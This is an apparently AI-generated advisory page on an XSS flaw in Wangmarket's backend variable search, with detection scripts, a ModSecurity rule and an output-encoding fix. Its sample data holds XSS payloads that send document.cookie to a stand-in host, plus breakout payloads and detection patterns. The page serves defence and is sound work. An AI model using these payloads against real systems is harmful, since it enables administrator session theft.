CVE-2025-15452 Overview
A Cross-Site Scripting (XSS) vulnerability has been identified in xnx3 Wangmarket versions up to 4.9. The flaw is in the variableList function behind the /admin/system/variableList.do endpoint of the Backend Variable Search component. A remote attacker can manipulate the Description argument so that arbitrary client-side script is rendered to, and executed by, other authenticated backend users, which can lead to session hijacking, credential theft, or other actions carried out with the victim's privileges.
Critical Impact
A remote attacker who already holds a high-privilege (backend) account can exploit the missing output encoding to inject script that runs in other backend users' browsers, compromising administrator sessions and, through them, the backend itself.
Affected Products
- xnx3 Wangmarket versions up to 4.9
- Wangmarket Backend Variable Search component
- /admin/system/variableList.do endpoint
Discovery Timeline
- 2026-01-05 - CVE-2025-15452 published to NVD
- 2026-01-08 - Last updated in NVD database
Technical Details for CVE-2025-15452
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting (XSS). The flaw exists in the Backend Variable Search functionality of the Wangmarket content management system, specifically within the variableList function that handles the Description parameter.
When a user with administrative privileges submits data through the variable list interface, the application does not sanitize or encode the Description value before rendering it in the response page. Markup or JavaScript in that value is therefore emitted as live HTML and executes in the browser of anyone who views the resulting page.
Exploitation requires high privileges (an existing backend account) and user interaction from the victim, who must view the affected page. That narrows the attack surface, but the risk remains real in multi-administrator deployments: an attacker who has obtained one backend account, or a partially trusted administrator, can use it to take over the sessions of other administrators.
Root Cause
The root cause is insufficient input validation and, above all, missing output encoding in the Wangmarket backend. The variableList function behind /admin/system/variableList.do takes the Description argument and writes it into the response without the HTML entity encoding appropriate to the output context (text node, attribute value, or script block).
Because the value is emitted as markup rather than as text, any HTML or JavaScript it contains is parsed and executed by the browser of every user who views the rendered content.
Attack Vector
The attack is network-based and is launched against the administrative interface. An attacker with backend access crafts a payload containing JavaScript in the Description field of a variable list entry or variable search request.
When the payload is rendered for another administrator or backend user viewing the variable search results, the script executes in the victim's browser. It can then read the session cookie if that cookie is not flagged HttpOnly, issue authenticated requests to the backend on the victim's behalf regardless of that flag, or redirect the victim to an attacker-controlled site. Whether the payload persists in the variable record (stored XSS) or is only reflected in the search response is not spelled out in the public advisory; in the reflected case the victim has to be induced to open a crafted link, which matches the user-interaction requirement.
The exploit has been made publicly available, increasing the risk of active exploitation. Technical details are documented in the VulDB advisory and additional security documentation is available in the Yuque security document.
Detection Methods for CVE-2025-15452
Indicators of Compromise
- Unusual or unexpected JavaScript code appearing in variable Description fields within the Wangmarket backend
- HTTP requests to /admin/system/variableList.do containing encoded script tags or event handlers in the Description parameter
- Abnormal session activity or unauthorized administrative actions following access to the variable list page
- Unexpected dialog boxes, redirects, or outbound requests to unfamiliar hosts when viewing backend variable search results
Detection Strategies
- Add Web Application Firewall (WAF) rules that inspect the Description parameter in both GET and POST requests to /admin/system/variableList.do and block XSS payloads (a search endpoint is commonly called with GET)
- Inspect request parameters for common XSS patterns such as <script>, javascript:, onerror= and other event-handler attributes in the Description parameter; decode URL encoding (including double encoding) and HTML entities before matching, and note that standard access logs only capture GET parameters, so POST bodies need WAF or application-level logging
- Send a Content Security Policy (CSP) header with a report-uri or report-to directive (Content-Security-Policy-Report-Only to start) so that inline script the policy disallows is reported rather than silently executed
- Conduct regular security audits of stored content in the variable list database for suspicious entries
Monitoring Recommendations
- Enable detailed logging for all administrative actions within the Wangmarket backend, particularly for the variable search functionality
- Alert on any request to the affected endpoint whose Description parameter contains markup, and on bursts of requests to it from a single account or address
- Collect CSP violation reports from the administrative UI so that unexpected inline script execution in administrators' browsers is surfaced centrally
- Regularly review stored variable descriptions for signs of injection attempts
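The two checks above that can be automated, scanning request logs for XSS patterns in the Description parameter and auditing the stored variable descriptions, share the same matcher, so the following added example (written for this page, not Wangmarket code) does both. It assumes an Apache/Nginx-style combined access log, in which GET parameters appear in the request line (POST bodies do not, so POST traffic needs WAF or application logging), and a list of (id, description) rows exported from the variable table, whose name the advisory does not give. The log lines and rows are constructed sample data.

```python
"""Scan access-log lines and stored variable rows for XSS probes against the
Wangmarket backend variable search endpoint (CVE-2025-15452).

Added example for this page, not Wangmarket code. Assumes a combined access
log (GET parameters only) and (id, description) rows from the variable table.
"""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/admin/system/variableList.do"

# Constructs that have no business in a variable description: a script tag,
# a javascript: URL, an HTML event-handler attribute, or a tag that commonly
# carries one. The \b keeps benign values such as "bonus=1" from matching.
XSS_RE = re.compile(
    r"(?i)(<\s*script|javascript\s*:|\bon\w+\s*=|<\s*(?:img|svg|iframe|object|embed)\b)"
)

# Combined log format: ip ident user [time] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise(value: str) -> str:
    """Strip the encodings an attacker layers on to evade naive matching:
    up to three rounds of percent-decoding, then HTML entity decoding."""
    prev, cur = None, value
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return html.unescape(cur)


def is_suspicious(value: str) -> bool:
    return XSS_RE.search(normalise(value)) is not None


def scan_access_log(lines):
    """Return (ip, user, decoded_description) for each request to the
    endpoint whose Description query parameter looks like an XSS payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != ENDPOINT:
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # decodes once
        for desc in params.get("Description", []):
            if is_suspicious(desc):
                hits.append((m["ip"], m["user"], normalise(desc)))
    return hits


def audit_descriptions(rows):
    """Return the ids of stored variable rows whose description carries
    executable markup (rows are (id, description); description may be NULL)."""
    return [row_id for row_id, desc in rows if is_suspicious(desc or "")]


# Constructed sample data, not real traffic or real database content.
SAMPLE_LOG = [
    '203.0.113.7 - admin [05/Jan/2026:10:01:02 +0000] "GET /admin/system/variableList.do?Description=site_title HTTP/1.1" 200 512',
    '203.0.113.7 - admin [05/Jan/2026:10:01:40 +0000] "GET /admin/system/variableList.do?Description=%3Cscript%3Elocation%3D%27http%3A%2F%2Fexample.invalid%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 901',
    '203.0.113.7 - admin [05/Jan/2026:10:02:11 +0000] "GET /admin/system/variableList.do?Description=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 899',
    '198.51.100.4 - editor [05/Jan/2026:10:03:00 +0000] "GET /admin/system/variableList.do?Description=bonus%3D1 HTTP/1.1" 200 500',
    '198.51.100.4 - editor [05/Jan/2026:10:03:30 +0000] "GET /admin/login.do HTTP/1.1" 200 300',
]
SAMPLE_ROWS = [
    (1, "Site title shown in the page header"),
    (2, "Promo flag: bonus=10 for January"),
    (3, '<svg/onload=fetch("//example.invalid/?c="+document.cookie)>'),
    (4, None),
]

if __name__ == "__main__":
    for ip, user, desc in scan_access_log(SAMPLE_LOG):
        print(f"request hit  {ip} {user}: {desc!r}")
    for row_id in audit_descriptions(SAMPLE_ROWS):
        print(f"stored hit   variable id {row_id}")
```

The third sample request is double-encoded (%2522 for a quote), which a single URL-decode would miss; the bounded decode loop catches it, while the "bonus=1" request and the "bonus=10" row stay clean because of the word boundary in the event-handler pattern. The matcher is a deliberately narrow deny-list meant for triage, so review hits by hand rather than acting on them automatically.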
How to Mitigate CVE-2025-15452
Immediate Actions Required
- Restrict access to the Wangmarket administrative backend to trusted IP addresses only
- Review existing variable list entries for any suspicious or unexpected content in Description fields
- Require re-authentication (step-up) for sensitive backend functions and keep backend session lifetimes short, so that a hijacked administrator session is of limited value
- Consider temporarily disabling the variable list feature until a patch is available
Patch Information
The vendor (xnx3) was contacted early regarding this vulnerability disclosure but did not respond. As of the last update on 2026-01-08, no official patch has been released for this vulnerability.
Organizations using Wangmarket should monitor the official project channels for security updates and consider implementing compensating controls until a fix is available. For technical details and updates, refer to the VulDB entry.
Workarounds
- Apply output encoding at the application level by modifying the variableList view so that the Description parameter is encoded for the context in which it is rendered (HTML text, attribute value, or script block); input validation on the parameter is defense in depth, not a substitute
- Deploy a Web Application Firewall (WAF) with rules specifically targeting XSS patterns in the affected endpoint
- Implement Content Security Policy (CSP) headers with strict directives to prevent inline script execution; roll this out in report-only mode first, because a legacy admin UI that itself relies on inline scripts will break under a strict policy
- Limit administrative access to essential personnel only and enforce multi-factor authentication for backend access
- Consider using a reverse proxy to filter and sanitize input before it reaches the application
# Example WAF rule configuration for blocking XSS in the Description parameter
# ModSecurity rule for Apache/Nginx. The chained rule scopes the check to the
# affected endpoint (REQUEST_FILENAME excludes the query string); the
# parameter is URL- and entity-decoded before matching so %3Cscript%3E and
# &lt;script&gt; are caught, and the \b in the event-handler pattern keeps
# benign values such as "bonus=1" from matching. Run in DetectionOnly first.
SecRule REQUEST_FILENAME "@endsWith /admin/system/variableList.do" \
    "id:100001,\
    phase:2,\
    deny,\
    status:403,\
    msg:'Potential XSS in variableList Description parameter',\
    logdata:'Matched Data: %{MATCHED_VAR}',\
    severity:'WARNING',\
    chain"
    SecRule ARGS:Description "@rx (?i)(<\s*script|javascript\s*:|\bon\w+\s*=)" \
        "t:none,t:urlDecodeUni,t:htmlEntityDecode"
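The application-level fix listed first among the workarounds, and the root cause described earlier, come down to encoding the Description value for each output context. The following added example is written for this page and is not Wangmarket's code: the real view is a Java page whose source the advisory does not reproduce, so render_vulnerable() and render_fixed() are hypothetical stand-ins that show the CWE-79 defect beside its fix, and injected_executables() counts what a browser would execute in each. The payloads are constructed samples.

```python
"""Context-aware output encoding for the Description value.

Added example for this page, not Wangmarket's code; the render functions are
hypothetical stand-ins for the real view. Payloads are constructed samples.
"""
import html
import json
from html.parser import HTMLParser


def render_vulnerable(description: str) -> str:
    """Stand-in for the flawed view: the search term is concatenated into
    the response in three contexts without any encoding."""
    return (
        f"<p>Results for: {description}</p>\n"
        f'<input name="Description" value="{description}">\n'
        f'<script>var q = "{description}";</script>'
    )


def for_js_string(value: str) -> str:
    """JS string literal for a value: json.dumps quotes and escapes it, and
    <, > and & are written as \\uXXXX so a "</script>" inside the value cannot
    close the surrounding script block."""
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


def render_fixed(description: str) -> str:
    """Same three contexts, each with the encoder that context requires:
    HTML text, quoted HTML attribute, JavaScript string literal."""
    return (
        f"<p>Results for: {html.escape(description)}</p>\n"
        f'<input name="Description" value="{html.escape(description, quote=True)}">\n'
        f"<script>var q = {for_js_string(description)};</script>"
    )


class _ExecutableCounter(HTMLParser):
    """Counts what a browser would execute: script elements and on* attributes."""

    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.handlers += sum(1 for name, _ in attrs if name.startswith("on"))


def injected_executables(page: str) -> int:
    """Executable constructs in the page beyond its own single <script>."""
    p = _ExecutableCounter()
    p.feed(page)
    p.close()
    return (p.scripts - 1) + p.handlers


# Constructed payloads: attribute/tag breakout and script-block breakout.
PAYLOADS = [
    '"><img src=x onerror=alert(1)>',
    "</script><script>alert(document.cookie)</script>",
]

if __name__ == "__main__":
    for payload in PAYLOADS:
        print(f"{payload!r}: vulnerable={injected_executables(render_vulnerable(payload))}, "
              f"fixed={injected_executables(render_fixed(payload))}")
    print(render_fixed(PAYLOADS[0]))
```

The point of three encoders rather than one is that HTML entity encoding alone does not make a value safe inside a script block, and a JavaScript string escape alone does not make it safe in an attribute. In a Java view the equivalents are JSTL <c:out> or fn:escapeXml for HTML text and attributes, and the OWASP Java Encoder's Encode.forHtml, Encode.forHtmlAttribute and Encode.forJavaScript for the three contexts shown here.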
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

